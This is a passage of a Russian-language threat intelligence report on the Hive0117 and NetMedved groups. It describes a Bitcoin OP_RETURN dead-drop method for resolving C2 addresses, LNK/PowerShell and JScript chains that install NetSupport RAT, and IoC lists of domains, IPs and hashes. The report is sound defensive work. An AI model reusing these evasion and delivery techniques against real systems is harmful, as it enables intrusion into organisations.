Более подробное описание цепочки атаки, тактик, техник и используемого вредоносного ПО приведено в статье «CloudAtlas. Новая волна кибератак на Россию и Ирак с использованием цепочек легитимных веб‑ресурсов».

Доменыcliente.k4marcas.com.br
cendekiaterpadu.org
elrionosune.unlu.edu.ar
Имена файловWebCachea54.vbs
WebCachea54.jfm
WebCachea54tmp0.vbs
Виды_помощи_Форма.doc
Контрольная сумма99dd3110fe1fa60756f4152738f7512b
ca816734a7918e90399ed9019340ef24
5f52ec3c82e1247b1c797264947f89d
452ac4e0f078b447ca667a86fb82ae3a
cda569971cd97acd391d29d51dd1c3fa
48cd63be969158b52dcc3e393f2ea253
8a54aa77c5c5bde22a5e8a73b30d9a8a
3f30db50b0e0b008c6f41a7c81543ae3

Финансово мотивированные группировки

Hive0117

Другие названияWatch Wolf
Ratopak Spider
UAC-0008
Начало активности2022
ИнструментыDarkWatchman
Buhtrap
FlawedAmmyy
UltraVNC
География атакРоссия
Литва
Эстония
Украина
США
Латвия
Атакуемые отраслиИндустрия гостеприимства 
Логистические компании 
Правительственный сектор 
Производство 
Розничная торговля 
Сельское хозяйство 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор 
Энергетика

В первом квартале 2026 года специалисты PT ESC уже описывали активность группировки Hive0117: рассылки осуществлялись со скомпрометированных почтовых ящиков; темы писем были связаны с финансами («Задолженность по оплате», «Счет на оплату», «Акт сверки»), целевой аудиторией являлись сотрудники финансовых департаментов.

Во втором квартале 2026 года группировка сохранила эту модель: обнаруженные образцы маскируются под бухгалтерские документы, например «Счет на оплату СМ-28.exe». Сами образцы представляют собой бинарники C++, которые расшифровывают и запускают обфусцированный JS‑код — загрузчик следующих стадий; запуск выполняется через Windows Script Host командой wscript.exe /E:jscript «%s» %d.

Главным изменением во втором квартале стал способ получения адреса управляющего сервера: вместо прописанных C2 в теле JS‑скрипта группировка перешла на получение C2 через блокчейн Bitcoin. Скрипт обращается к mempool.space/api/address/{BTC‑адрес}/txs (при недоступности — к аналогичному эндпойнту blockstream.info) и получает список транзакций по заданному адресу.

Рисунок 23. Содержимое ответа сервера

В ответе сервера разбирается подстрока «scriptpubkey":"6a» — признак выхода OP_RETURN; данные, расположенные после этого маркера, декодируются из hex в ASCII и образуют итоговый URL управляющего сервера.

В ходе анализа в изолированной среде подтверждено обращение к адресу bc1qtnkl7eshwh0ny8xmheefcw9lk6np5wptc4m7lu: в одной из транзакций по этому адресу обнаружен OP_RETURN-выход с hex-данными, декодирующимися в http://199.91.221.19:80/index.php. Этот же IP-адрес зафиксирован как получатель регулярных POST-запросов от образца на протяжении всего сеанса анализа.

Таким образом, адрес в блокчейне фактически работает как dead-drop resolver: операторы публикуют транзакцию с OP_RETURN‑выходом, кодирующим текущий адрес C2, а вредоносное ПО лишь отслеживает историю транзакций по этому адресу, не обращаясь напрямую к серверу до момента резолва.

Сами сервисы mempool.space и blockstream.info являются легитимными публичными обозревателями блокчейна и не относятся к вредоносной инфраструктуре. Их открытые API позволяют группировке скрывать фактический адрес C2 от статического анализа и затрудняют блокировку по доменному признаку, поскольку блокировка самих этих сервисов нецелесообразна. При этом обращения к таким API могут использоваться как отдельный сетевой индикатор: в сегментах, где взаимодействие с блокчейн-инфраструктурой нехарактерно, запросы к mempool.space, blockstream.info и аналогичным API целесообразно учитывать в правилах детектирования и сетевых профилях.

IP-адреса199.91.221.19
Имена файловpatched.bin
Контрольная сумма390e2353b18e882eb3e367e7336e0837
dfbc3864f637a46b25da7e59f79b0f65
bc799bf122d116fc31dc2b0f39dfc8f7
bd7913d873c436fa3582c739fcf58063
af9bbf293b5a12732040b8c94cfe1771

NetMedved

Другие названияClubfoot Wolf
Начало активности2024
ИнструментыNetSupport
Lumma
География атакРоссия
Атакуемые отраслиЛогистические компании 
Розничная торговля

Специалисты киберразведки PT ESC зафиксировали летнюю фишинговую кампанию группировки NetMedved, нацеленную на российские организации. Как и в ранее описанных атаках группировки, операторы используют деловую тематику — заявки на закупку от имени российских компаний — и легитимный инструмент удаленного администрирования NetSupport Manager, развернутый в системе жертвы в качестве RAT. В рамках кампании выявлены два сценария доставки полезной нагрузки.

Рисунок 24. Схема заражения через ZIP-архив с LNK-файлом

Первый сценарий запускается вредоносным LNK-файлом, маскирующимся под заявку на закупку. LNK выполняет закодированную в Base64 PowerShell‑команду, которая через redirector‑домен crop.sh обращается к sunlightfriends.tech и получает AES-128-CBC-зашифрованный PowerShell-код второго этапа; после расшифровки и выполнения в памяти этот код загружает ZIP-архив, распаковывает его в %LOCALAPPDATA% и разворачивает NetSupportRAT с закреплением через ключ автозапуска в реестре.

Рисунок 25. Схема заражения через ZIP-архив с JScript-файлом

Второй сценарий использует ZIP-архив с JScript‑файлом под тем же закупочным прикрытием. В отличие от LNK-варианта JScript‑дроппер извлекает документ‑приманку и компоненты NetSupport Client непосредственно из собственного тела через декодирование bin.base64, не обращаясь к внешней инфраструктуре, и закрепляется в системе одновременно двумя способами — скрытой задачей планировщика и ключом автозапуска. Ретроспективный анализ показал, что аналогичная JScript-цепочка применялась группировкой с 2024 года — с тем же payload (NetSupportRAT) и близким шаблоном именования файлов-приманок.

Несмотря на полную смену инфраструктуры между кампаниями, у обоих вариантов совпадают атрибутивные признаки: одна и та же сборка NetSupportRAT 2017 года, парная схема gateway‑серверов в конфигурации client32.ini и идентичное значение SecurityKey2. Из нового в кампании 2026 года — собственный redirect‑слой (crop.sh), многоуровневое AES-шифрование полезной нагрузки и инфраструктурная кластеризация: пять из семи C2-доменов зарегистрированы в один день, 27.04.2026.

Более подробное описание цепочки атаки, тактик и используемого вредоносного ПО приведено в статье «NetMedved и летняя кампания против российских организаций».

Доменыcrop.sh
sunlightfriends.tech
fleepsterones.fun
imhfamily.com
akiliridge.com
stillpaving.com
glowstickspro.com
IP-адреса185.158.249.83
79.132.128.202
144.172.116.63
Имена файловЗаявка на закупку от компании ООО [REDACTED] на июнь 2026 г.lnk
Заявка на закупку от компании ООО [REDACTED]на май 2026г_105.js
Карточка_предприятия.docx
Реквизиты [REDACTED].doc
Контрольная сумма56cc6b8260c676dca2ee4e4ef4785373
da95797a9bcfe8ee9500077636f0835a
5c56fd9d306a62642cfe6c6b3989efdd
174a44b2a1511e7ebf64525beffd0f9f
06e85fc3718ececcdd3766e7fee93a7f
04a99c1cdcc0c9aa0c63c20d89f9b00f

Выводы

За отчетный период активность отслеживаемых хакерских группировок сохранила высокий уровень: зафиксировано 839 уникальных образцов вредоносного ПО — на 88% больше, чем во втором квартале 2025 года, при этом основной вклад внесли несколько наиболее активных группировок. Рост образцов сопровождается заметным перераспределением целевых приоритетов: атакующие активизировали операции против социально значимых секторов экономики — образования, здравоохранения, транспорта и производства, одновременно сохраняя давление на государственные структуры и финансовый сектор.

В рейтинге активных группировок произошли изменения, связанные как с абсолютными показателями активности, так и с переориентацией мотиваций. Rare Werewolf продолжает демонстрировать высокий уровень активности и сохраняет доминирующую позицию. Вместе с тем зафиксирован рост образцов от финансово‑мотивированных акторов, включая DarkGaboon и Hive0117, которые активизировали рассылки, нацеленные на финансовые подразделения организаций. Однако группировки, ориентированные на шпионаж, остаются доминирующей силой в ландшафте угроз: PhantomCore, CloudAtlas и IAmTheKing сохраняют стабильную высокую активность, атакуя государственные структуры, оборонно-промышленный комплекс и исследовательские организации.

Ключевым вектором первоначального доступа остается фишинг, где злоумышленники активно используют деловую, финансовую и государственную тематику, а также скомпрометированные легитимные почтовые ящики для повышения доверия и обхода базовой фильтрации. Наблюдается системное усложнение цепочек доставки и управления: использование легитимных публичных сервисов и взломанных веб‑сайтов в качестве промежуточных узлов для маскировки управляющих серверов; применение легитимных инструментов удаленного администрирования; механизмы закрепления через планировщик задач и нестандартные способы получения адреса управляющего сервера, включая блокчейн Bitcoin.

Для снижения рисков организациям необходимо усиливать контроль почтовых вложений и ссылок, отслеживать подозрительные сценарии запуска через Windows Script Host, PowerShell, планировщик задач и ключи автозапуска, контролировать использование средств удаленного доступа и регулярно обновлять правила детектирования на основе актуальных IoC и TTP.